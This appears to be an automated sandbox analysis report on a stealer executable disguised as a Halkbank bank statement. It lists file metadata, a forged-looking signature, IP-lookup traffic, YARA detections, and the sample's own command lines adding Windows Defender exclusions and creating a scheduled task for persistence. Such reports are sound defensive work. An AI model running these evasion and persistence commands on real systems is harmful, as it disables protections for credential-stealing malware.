Static PE Info

General

Entrypoint:	0x49698e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC316BEF2 [Tue Sep 19 11:56:34 2073 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9693a	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x584	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x95400	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92cf8	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x94994	0x94a00	8007cda48cade1910a9963a31fdb30c9	False	0.8415866142767031	data	7.53075334816428	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x584	0x600	efff4441a07fc59b389d38956424eb38	False	0.4127604166666667	data	4.009328243241296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	324d5d1feca97b5fd942ae9736c63948	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x98090	0x2f4	data			0.44047619047619047
RT_MANIFEST	0x98394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T12:00:21.861081+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49713	132.226.247.73	80	TCP
2024-10-24T12:00:22.376699+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49721	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 12:00:10.936918974 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:10.942573071 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:10.942652941 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:10.942898989 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:10.948316097 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:18.328843117 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:18.334285975 CEST	80	49721	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:18.334590912 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:18.334590912 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:18.339967012 CEST	80	49721	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:18.975364923 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:18.989768028 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:18.995132923 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:21.808785915 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:21.826689005 CEST	49749	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.826716900 CEST	443	49749	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.826833010 CEST	49749	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.833012104 CEST	49749	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.833030939 CEST	443	49749	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.849606991 CEST	80	49721	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:21.853210926 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:21.855906963 CEST	443	49749	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.855983019 CEST	49749	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.858586073 CEST	80	49721	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:21.861080885 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:21.865580082 CEST	49749	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.865592957 CEST	443	49749	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.867165089 CEST	49752	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.867178917 CEST	443	49752	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.867399931 CEST	49752	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.867650032 CEST	49752	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.867665052 CEST	443	49752	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.891202927 CEST	443	49752	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:21.891268015 CEST	49752	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.891681910 CEST	49752	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:21.891690016 CEST	443	49752	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:22.333714008 CEST	80	49721	132.226.247.73	192.168.2.5
Oct 24, 2024 12:00:22.335422993 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:22.335444927 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:22.335539103 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:22.341000080 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:22.341012955 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:22.376698971 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:00:23.833836079 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:23.833915949 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:23.835901022 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:23.835910082 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:23.836369038 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:23.876862049 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:23.888871908 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:23.931358099 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:24.028881073 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:24.029069901 CEST	443	49754	188.114.96.3	192.168.2.5
Oct 24, 2024 12:00:24.029135942 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:00:24.044027090 CEST	49754	443	192.168.2.5	188.114.96.3
Oct 24, 2024 12:01:26.944648981 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:01:26.944710970 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:01:27.495840073 CEST	80	49721	132.226.247.73	192.168.2.5
Oct 24, 2024 12:01:27.496129990 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:02:01.818125010 CEST	49713	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:02:01.823488951 CEST	80	49713	132.226.247.73	192.168.2.5
Oct 24, 2024 12:02:02.361466885 CEST	49721	80	192.168.2.5	132.226.247.73
Oct 24, 2024 12:02:02.366974115 CEST	80	49721	132.226.247.73	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 12:00:10.920336008 CEST	62794	53	192.168.2.5	1.1.1.1
Oct 24, 2024 12:00:10.928242922 CEST	53	62794	1.1.1.1	192.168.2.5
Oct 24, 2024 12:00:21.818593025 CEST	53555	53	192.168.2.5	1.1.1.1
Oct 24, 2024 12:00:21.825975895 CEST	53	53555	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 12:00:10.920336008 CEST	192.168.2.5	1.1.1.1	0x9aa1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:21.818593025 CEST	192.168.2.5	1.1.1.1	0x66cf	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 12:00:10.928242922 CEST	1.1.1.1	192.168.2.5	0x9aa1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2024 12:00:10.928242922 CEST	1.1.1.1	192.168.2.5	0x9aa1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:10.928242922 CEST	1.1.1.1	192.168.2.5	0x9aa1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:10.928242922 CEST	1.1.1.1	192.168.2.5	0x9aa1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:10.928242922 CEST	1.1.1.1	192.168.2.5	0x9aa1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:10.928242922 CEST	1.1.1.1	192.168.2.5	0x9aa1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:21.825975895 CEST	1.1.1.1	192.168.2.5	0x66cf	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 12:00:21.825975895 CEST	1.1.1.1	192.168.2.5	0x66cf	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	132.226.247.73	80	3924	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 12:00:10.942898989 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 12:00:18.975364923 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 24 Oct 2024 10:00:18 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 2b2d228e965b49dd8ec3aab7fca6734d Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 24, 2024 12:00:18.989768028 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 24, 2024 12:00:21.808785915 CEST	323	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 10:00:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b16a7bb374175fd6a08411a3fb12f00 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49721	132.226.247.73	80	7480	C:\Users\user\AppData\Roaming\bAZAANr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 12:00:18.334590912 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 12:00:21.849606991 CEST	323	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 10:00:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 61b2e732f06bd201eab0ef03cba592fb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:00:21.853210926 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 24, 2024 12:00:22.333714008 CEST	323	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 10:00:22 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 198784935b4b2c378db8578e0b08b4d7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49754	188.114.96.3	443	7480	C:\Users\user\AppData\Roaming\bAZAANr.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 10:00:23 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 10:00:24 UTC	899	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 10:00:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29971 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFsoVyOpQibsEnrr%2F%2BINP2lNUe%2FS6UVUOKjxGkloaXbFU8v4OX1SE1h2tQz4PIbbYCOG1X6OTEoHZgfXsFAAGHSETuNP6pTk%2F2zcxLtz8lLL0fZjogHQph5a%2BrKDdyaRzi4ok9Oa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d791e9db98847ac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1091&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=693b23f1a2f42d87&ts=1077&x=0"
2024-10-24 10:00:24 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 10:00:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:00:03
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Imagebase:	0x3f0000
File size:	625'160 bytes
MD5 hash:	F52B285B21A1D390EC4E436E11957BD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2160882311.0000000004FD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Imagebase:	0xa40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe"
Imagebase:	0xa40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp"
Imagebase:	0xbc0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:00:09
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Imagebase:	0x6d0000
File size:	625'160 bytes
MD5 hash:	F52B285B21A1D390EC4E436E11957BD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4555924157.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	06:00:10
Start date:	24/10/2024
Path:	C:\Users\user\AppData\Roaming\bAZAANr.exe
